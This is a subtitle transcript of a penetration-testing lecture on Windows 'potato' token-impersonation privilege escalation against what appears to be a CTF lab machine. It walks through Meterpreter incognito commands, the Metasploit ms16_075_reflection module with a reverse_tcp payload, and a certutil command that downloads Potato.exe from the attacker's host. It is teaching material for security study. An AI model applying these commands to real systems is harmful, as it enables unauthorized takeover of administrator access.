1 00:00:00,690 --> 00:00:09,090 Hi. With this lecture, we're going to continue exploring the other vulnerabilities that we see in
2 00:00:09,090 --> 00:00:10,260 this machine.
3 00:00:10,260 --> 00:00:11,880 I'm still in the Windows machine.
4 00:00:12,120 --> 00:00:13,700 I'm logged in as a user.
5 00:00:13,710 --> 00:00:20,400 If you don't have that session currently going on right now, just open another Meterpreter session by
6 00:00:20,400 --> 00:00:21,780 running your ASPX.
7 00:00:22,050 --> 00:00:27,840 And this is the reason why we have chosen this machine in the first place, because it has more than
8 00:00:27,840 --> 00:00:31,200 one vulnerability in order to escalate your privilege.
9 00:00:31,650 --> 00:00:34,110 And I'm going to continue looking for those.
10 00:00:34,110 --> 00:00:40,560 And we're going to specifically focus on potato attacks because they can be found in CTFs and pentests as well.
11 00:00:40,800 --> 00:00:42,540 And that is this one.
12 00:00:42,540 --> 00:00:46,300 So MS16-075 Reflection.
13 00:00:46,860 --> 00:00:52,710 OK, so it says that the target appears to be vulnerable and we're going to focus on that one and we're
14 00:00:52,710 --> 00:01:00,180 going to see how to exploit it automatically, if you actually have to.
15 00:01:00,210 --> 00:01:03,400 Later on, I'm going to show you how to do it manually as well.
16 00:01:03,930 --> 00:01:08,790 So if I search for that on Google, I'm going to go to Rapid7.
17 00:01:08,790 --> 00:01:10,320 I'm going to go to GitHub
18 00:01:10,320 --> 00:01:13,490 in order to show you what potato attacks mean.
19 00:01:14,490 --> 00:01:19,700 OK, so let me just come over here and see if we have a good description over there.
20 00:01:21,450 --> 00:01:22,830 I believe in the Rapid7 one
21 00:01:22,840 --> 00:01:28,650 we only have a description or instructions, you know, to use this in Metasploit.
22 00:01:28,920 --> 00:01:32,250 OK, I'm going to, of course, show you how to do this as well.
23 00:01:32,580 --> 00:01:36,300 But I'm going to find another thing over here.
24 00:01:36,300 --> 00:01:37,460 Maybe this is good.
25 00:01:38,010 --> 00:01:43,260 So this module will abuse the SeImpersonate privilege.
26 00:01:43,860 --> 00:01:48,830 So it is a commonly found vulnerability in services.
27 00:01:48,960 --> 00:01:50,430 OK, it says so here.
28 00:01:50,430 --> 00:01:54,020 And it appears to be so in real life as well.
29 00:01:55,170 --> 00:01:58,020 So what do we mean by impersonation?
30 00:01:58,500 --> 00:02:06,510 So if we go to our Meterpreter shell, OK, I remember we have gathered information when we first
31 00:02:07,440 --> 00:02:12,440 hacked into the system and we had actually run whoami.
32 00:02:12,810 --> 00:02:16,320 So if I run getuid, you will see that I am IIS APPPOOL.
33 00:02:16,320 --> 00:02:18,780 I'm not an administrator or something like that.
34 00:02:19,440 --> 00:02:21,930 And we're going to talk about tokens.
35 00:02:21,930 --> 00:02:23,490 So token is spelled like this.
36 00:02:23,490 --> 00:02:27,930 And if you don't know what a token is, think about web applications.
37 00:02:28,200 --> 00:02:36,540 So it actually is a tool that defines our authentication, our user identity.
38 00:02:36,780 --> 00:02:43,160 So if you go to a website, if you make a request to a server, generally, most of the time you get
39 00:02:43,170 --> 00:02:44,100 a token back.
40 00:02:44,460 --> 00:02:49,760 And that's how a server understands that requests are coming from you.
41 00:02:49,770 --> 00:02:51,510 So it responds to you.
42 00:02:51,960 --> 00:02:58,350 Think of it like a cookie, and it actually is valid in the Windows system as well.
43 00:02:58,680 --> 00:03:04,370 So you get a token as a user and other users get a token as well.
44 00:03:04,530 --> 00:03:14,160 OK, so another thing over here is that you can actually impersonate some other users using their token.
45 00:03:15,240 --> 00:03:20,280 So this isn't actually a vulnerability. I'm going to show you that. First of all, you're going to
46 00:03:20,280 --> 00:03:28,020 have to run load incognito because we're going to want to display these tokens by running
47 00:03:28,020 --> 00:03:29,160 this list_tokens
48 00:03:29,280 --> 00:03:30,570 -u.
49 00:03:30,570 --> 00:03:32,130 And there is an underscore in between.
50 00:03:32,130 --> 00:03:38,970 It lists tokens that you... so as you can see, the tokens available to me: IIS APPPOOL.
51 00:03:38,970 --> 00:03:46,090 And there are impersonation tokens available as well, which is the NT AUTHORITY user.
52 00:03:46,650 --> 00:03:51,410 So these impersonation tokens aren't necessarily a vulnerability.
53 00:03:51,410 --> 00:03:56,280 They can be used effectively in server administration as well.
54 00:03:56,550 --> 00:04:00,600 But if there's some mistake, then we can take leverage of that.
55 00:04:00,600 --> 00:04:08,130 We can impersonate the administrator user without even having to know the administrator's password
56 00:04:08,370 --> 00:04:15,780 and without even having to know their names, admin names; we can just impersonate them and we can
57 00:04:15,780 --> 00:04:21,060 be admin or we can run any command as admin in a way that we want.
58 00:04:21,540 --> 00:04:28,140 So in order to do that, first of all, we need to make sure that this is vulnerable.
59 00:04:28,150 --> 00:04:30,180 This is available to us.
60 00:04:30,660 --> 00:04:37,820 And we have seen the first sign in Metasploit, in the Windows local exploit suggester:
61 00:04:37,830 --> 00:04:41,190 we see that this is open to potato attacks.
62 00:04:41,570 --> 00:04:49,500 OK, so now I'm going to go into a shell, run whoami, so IIS APPPOOL, and I'm going to run whoami
63 00:04:49,530 --> 00:04:50,520 /priv.
64 00:04:50,880 --> 00:04:53,370 So you remember this command?
65 00:04:53,370 --> 00:05:00,710 I said that we were going to use it and over here we're going to have to look for this: Impersonate
66 00:05:00,720 --> 00:05:04,110 a client after authentication, SeImpersonatePrivilege.
67 00:05:04,320 --> 00:05:06,960 So it has to be enabled for some reason.
68 00:05:06,960 --> 00:05:08,700 I'm seeing everything enabled right now.
69 00:05:08,700 --> 00:05:13,920 But if you remember, at first when we hacked in, this was enabled by default.
70 00:05:13,950 --> 00:05:23,040 OK, so if this is enabled and if there is a way to gather the administrator token, then we can run
71 00:05:23,040 --> 00:05:23,730 this attack.
72 00:05:23,730 --> 00:05:27,550 And this attack is called potato attack for some reason.
73 00:05:27,980 --> 00:05:36,780 OK, so we can run a potato attack if we can see this table over here, if we are sure that these are
74 00:05:36,780 --> 00:05:44,730 enabled for us, I mean, this is enabled for us, and we can try to impersonate the admin itself so that
75 00:05:44,730 --> 00:05:46,500 we can escalate our privilege.
76 00:05:46,860 --> 00:05:50,310 Now, I'm going to exit out of this one into the Meterpreter.
77 00:05:50,520 --> 00:05:52,300 I'm going to run getprivs.
78 00:05:52,320 --> 00:05:56,160 And this is how you see the current privileges in the Meterpreter as well.
79 00:05:56,190 --> 00:06:02,670 OK, so you don't necessarily have to go into the Windows shell and just run whoami.
80 00:06:03,630 --> 00:06:07,590 You can also run getprivs in order to see your current privileges.
81 00:06:07,950 --> 00:06:12,820 And once you see the impersonate privilege over there, then you are good to go.
82 00:06:13,320 --> 00:06:16,090 Now we can do this easily in the Meterpreter.
83 00:06:16,380 --> 00:06:20,250 OK, we can run this potato attack in a very easy way.
84 00:06:20,730 --> 00:06:24,110 But it's spelled like this, by the way.
85 00:06:24,110 --> 00:06:29,300 It's actually "potato", but I'm going to show you the manual way as well.
86 00:06:29,550 --> 00:06:37,470 So if you search "potato attack", something like maybe with "Windows", on Google, you can see a lot of resources
87 00:06:37,470 --> 00:06:39,480 over here, like five million results.
88 00:06:39,720 --> 00:06:45,910 So I'm going to go for this Hot Potato and let's see what we have, what we have here.
89 00:06:46,380 --> 00:06:51,900 So it says that Potato privilege escalation on Windows 7, 8 and 10,
90 00:06:52,200 --> 00:06:56,280 Server 2008, 2012.
91 00:06:56,640 --> 00:07:03,020 And as you can see, there are some detailed explanations, technical explanations about this attack.
92 00:07:03,360 --> 00:07:06,810 You can actually read this if you want in your own time.
93 00:07:07,080 --> 00:07:11,000 It will be great for you to understand the theory behind it.
94 00:07:11,370 --> 00:07:18,030 We have this Hot Potato Windows privilege escalation tutorial or some kind of blog over here.
95 00:07:18,510 --> 00:07:25,440 So we see it actually is valid for like almost every Windows version over here.
96 00:07:25,800 --> 00:07:29,010 And it's not about a version.
97 00:07:29,010 --> 00:07:30,930 It's not about a security patch.
98 00:07:30,930 --> 00:07:35,220 Again, it's kind of a misconfiguration by the administrator user.
99 00:07:36,120 --> 00:07:47,220 It also gives us instructions about how to take leverage of this in a real life example or in a non-Meterpreter
100 00:07:47,220 --> 00:07:49,270 shell example, I believe.
101 00:07:49,500 --> 00:07:52,490 OK, and let's see what else we have over here.
102 00:07:53,130 --> 00:07:56,820 OK, we have another pentestlab blog.
103 00:07:57,210 --> 00:08:06,000 So it's kind of a blog and we see we can actually run this Potato.exe in a way that has
104 00:08:06,000 --> 00:08:07,320 been displayed over here.
105 00:08:07,920 --> 00:08:14,640 So if we go to the first thing that we have found, foxglovesecurity Potato,
106 00:08:15,210 --> 00:08:17,860 we can see under binaries over here.
107 00:08:17,880 --> 00:08:24,920 I'm going to share the link with you guys, and we have the Potato.exe. You don't have to do that,
108 00:08:24,930 --> 00:08:25,370 OK?
109 00:08:25,860 --> 00:08:30,420 It's easily done with the Meterpreter, again, that I'm going to show you.
110 00:08:30,420 --> 00:08:31,620 If you had to.
111 00:08:31,920 --> 00:08:32,990 If we had to.
112 00:08:33,030 --> 00:08:36,030 You can just follow along this as well.
113 00:08:36,180 --> 00:08:42,490 Like Potato.exe type commands, disable_exhaust or something like that.
114 00:08:42,510 --> 00:08:47,100 There are a lot of parameters that you should run in order to make this work.
115 00:08:47,310 --> 00:08:56,100 You can try this, OK, it tries to disable the Defender, it tries to run the Potato.exe and it tries to
116 00:08:56,100 --> 00:08:57,680 escalate your privilege in a way.
117 00:08:58,380 --> 00:09:01,770 OK, we're going to do this with Metasploit, as I said before.
118 00:09:02,010 --> 00:09:04,890 But I just want to show you something else as well.
119 00:09:05,220 --> 00:09:07,530 So I'm going to go into the shell, OK?
120 00:09:07,830 --> 00:09:13,110 And we are under the Windows\Temp, so I'm going to run certutil.
121 00:09:13,680 --> 00:09:15,150 So you don't know that.
122 00:09:15,150 --> 00:09:18,030 And this is one of the reasons why I'm showing you this.
123 00:09:18,030 --> 00:09:27,180 OK, so if you run certutil -urlcache -f and then specify a URL.
124 00:09:28,230 --> 00:09:36,630 OK, so let me find out the URL to specify. I believe we have to just download this Potato.exe to
125 00:09:36,630 --> 00:09:39,390 our Windows or Linux machine.
126 00:09:39,720 --> 00:09:41,750 OK, let's see if we can do that.
127 00:09:42,180 --> 00:09:45,300 And then I'm going to download this file.
128 00:09:45,480 --> 00:09:49,220 Let me just say open because Kali won't let me open it
129 00:09:49,230 --> 00:09:55,230 otherwise. I'm going to take this Potato.exe, OK, I'm going to cut this and I'm going to put this
130 00:09:55,230 --> 00:10:01,980 under my /var/www/html, which is the root of my web server.
131 00:10:02,050 --> 00:10:10,740 OK, so I'm in the Kali Linux, I'm going to run service apache2 start, so it starts my web server.
132 00:10:11,160 --> 00:10:20,580 Now if I actually just specify this IP address, which is my tun0, from the Meterpreter I can
133 00:10:20,580 --> 00:10:21,330 download it.
134 00:10:21,690 --> 00:10:28,050 Right, so 10.10.14.19/Potato.exe.
135 00:10:28,800 --> 00:10:33,520 So I'm going to call this Potato.exe and here you go.
136 00:10:34,230 --> 00:10:35,970 So why did I show you this?
137 00:10:36,300 --> 00:10:39,610 Because this is like the equivalent of wget.
138 00:10:39,740 --> 00:10:42,660 OK, we don't need this right now.
139 00:10:42,660 --> 00:10:43,980 You don't have to do that.
140 00:10:44,400 --> 00:10:46,740 And let me run ipconfig over here.
141 00:10:46,740 --> 00:10:48,690 So it's 10.10.10.5.
142 00:10:48,690 --> 00:10:50,270 So, yep, this is good.
143 00:10:50,670 --> 00:10:51,960 You don't have to do that.
144 00:10:51,960 --> 00:10:55,960 But if you need to, you should know how to do it.
145 00:10:56,390 --> 00:11:03,110 OK, so over here I have the... let me try to start this one more time.
146 00:11:03,120 --> 00:11:05,250 Yes, this is running.
147 00:11:05,520 --> 00:11:07,710 So I believe there is nothing wrong over here.
148 00:11:08,160 --> 00:11:10,280 And let me try that one more time.
149 00:11:10,290 --> 00:11:21,870 By the way, let me see if I misspelled it: certutil -urlcache -f http://10.10.14.19
150 00:11:21,870 --> 00:11:25,120 /Potato.exe.
151 00:11:25,140 --> 00:11:25,980 Let me see.
152 00:11:26,020 --> 00:11:26,250 Yeah.
153 00:11:26,250 --> 00:11:28,790 Potato.exe.
154 00:11:29,220 --> 00:11:36,480 OK, and now I'm going to call this Potato.exe and see if it works.
155 00:11:38,080 --> 00:11:38,610 Yep.
156 00:11:38,670 --> 00:11:41,760 I believe this is going to work again.
157 00:11:41,850 --> 00:11:44,130 Make sure you take a note of this
158 00:11:44,140 --> 00:11:45,810 certutil, OK.
159 00:11:45,810 --> 00:11:53,790 Yeah, it says that the command completed successfully, so if we look there right now, as you can see,
160 00:11:53,820 --> 00:11:54,030 yeah,
161 00:11:54,030 --> 00:11:56,760 Potato.exe is also here.
162 00:11:56,760 --> 00:12:01,520 So it didn't fail last time, but I had to do it again just to make sure.
163 00:12:02,130 --> 00:12:05,220 So again, why did I do that?
164 00:12:05,550 --> 00:12:13,170 If I had to, if I didn't have Metasploit or Meterpreter opened, then I should have done, well, done
165 00:12:13,170 --> 00:12:15,680 this with the Potato.exe.
166 00:12:16,110 --> 00:12:18,390 Remember how we go to Windows\Temp,
167 00:12:18,390 --> 00:12:19,920 like this.
168 00:12:19,920 --> 00:12:26,910 If you cannot go to Windows\Temp, just make sure you run this in order to run the certutil, because
169 00:12:27,090 --> 00:12:32,480 that's how you actually create a file, that's how you actually get a permission to write that file.
170 00:12:33,510 --> 00:12:39,210 So anyway, if I didn't have the Meterpreter, then I would have gone forward that way.
171 00:12:39,330 --> 00:12:46,680 But since I have the Meterpreter, OK, I'm going to go with this thing over here, so I'm going
172 00:12:46,680 --> 00:12:48,420 to get this into background.
173 00:12:48,630 --> 00:12:55,270 So I'm in session 2 and I'm going to show you how to run this in Metasploit.
174 00:12:55,530 --> 00:13:01,140 So we're going to find first the module name, which is ms16_075_reflection.
175 00:13:01,470 --> 00:13:05,520 So I believe you're going to have to make a note
176 00:13:05,520 --> 00:13:09,450 and remember that, because this is a very particular one.
177 00:13:09,450 --> 00:13:11,040 It's about potato attacks.
178 00:13:11,280 --> 00:13:20,520 OK, once you go over here to ms16_075_reflection, then it says that no payload configured,
179 00:13:20,520 --> 00:13:24,990 defaulting to windows/meterpreter/reverse_tcp, which is good for us.
180 00:13:25,200 --> 00:13:27,030 But if you say show options
181 00:13:27,030 --> 00:13:30,120 and if you don't see the payload, you can always set the payload.
182 00:13:30,460 --> 00:13:33,360 So I'm going to set SESSION to 2, which is my current session.
183 00:13:33,540 --> 00:13:38,280 I'm going to set my LHOST to 10.10.14.19. LPORT,
184 00:13:38,280 --> 00:13:41,460 we can change that port or we can just leave it like this.
185 00:13:41,850 --> 00:13:50,310 OK, I'm going to exploit it and see if we can manage to become root, or at least we can manage to gather
186 00:13:50,310 --> 00:13:54,090 the administrator token.
187 00:13:55,110 --> 00:13:57,740 So it says that a Meterpreter session opened.
188 00:13:57,750 --> 00:14:00,660 If I run getuid, I'm still IIS APPPOOL.
189 00:14:01,290 --> 00:14:08,580 So let's do this and let's see if we can actually become the administrator, because I believe right
190 00:14:08,580 --> 00:14:12,720 now we get the token and we have to use it.
191 00:14:12,720 --> 00:14:15,930 So I'm going to go into the incognito one more time.
192 00:14:16,470 --> 00:14:20,130 So later on I'm going to list the tokens:
193 00:14:20,130 --> 00:14:20,940 list_tokens -u.
194 00:14:21,390 --> 00:14:22,470 And here you go.
195 00:14:22,470 --> 00:14:26,640 Now, the impersonation tokens available is showing the
196 00:14:27,890 --> 00:14:37,110 NT AUTHORITY user and NT AUTHORITY\SYSTEM, so I'm going to say impersonate, OK, impersonate_
197 00:14:37,130 --> 00:14:42,050 token, and I'm going to paste this thing in within the quotation marks.
198 00:14:42,770 --> 00:14:44,630 And here you go.
199 00:14:44,630 --> 00:14:47,810 It says "Successfully impersonated user NT AUTHORITY\SYSTEM".
200 00:14:48,320 --> 00:14:49,580 Now, let's try this.
201 00:14:49,580 --> 00:14:52,090 Let's see if we are actually the administrator.
202 00:14:52,280 --> 00:14:53,050 Here we go.
203 00:14:53,060 --> 00:14:54,460 We are the administrator.
204 00:14:54,470 --> 00:14:57,380 OK, so we are the administrator.
205 00:14:57,380 --> 00:14:58,940 I'm going to go back into the shell.
206 00:14:59,240 --> 00:14:59,960 I'm going to run
207 00:14:59,960 --> 00:15:00,550 whoami.
208 00:15:00,770 --> 00:15:02,240 We are the administrator.
209 00:15:02,690 --> 00:15:09,440 You can actually verify this by going into the Users, into the Administrator folder.
210 00:15:09,440 --> 00:15:12,740 If you can go over here, that means you're admin.
211 00:15:13,310 --> 00:15:20,690 So if you go to the Desktop, if you run dir, you will see the root.txt and you can just type it.
212 00:15:21,650 --> 00:15:22,640 Here you go.
213 00:15:23,060 --> 00:15:26,180 Now, again, one more time, we managed to become root.
214 00:15:26,180 --> 00:15:31,970 I mean, administrator in Windows, and we used potato attacks in order to do that.
215 00:15:32,270 --> 00:15:36,740 This is a common mistake that you can actually observe in the real systems as well.
216 00:15:36,980 --> 00:15:39,380 So you better understand how to use it.
217 00:15:39,740 --> 00:15:42,860 And I believe we covered every aspect of it.
218 00:15:43,340 --> 00:15:49,130 Now we're going to stop here, but we're going to continue with the privilege escalation in Windows
219 00:15:49,130 --> 00:15:51,950 again in the next lecture together.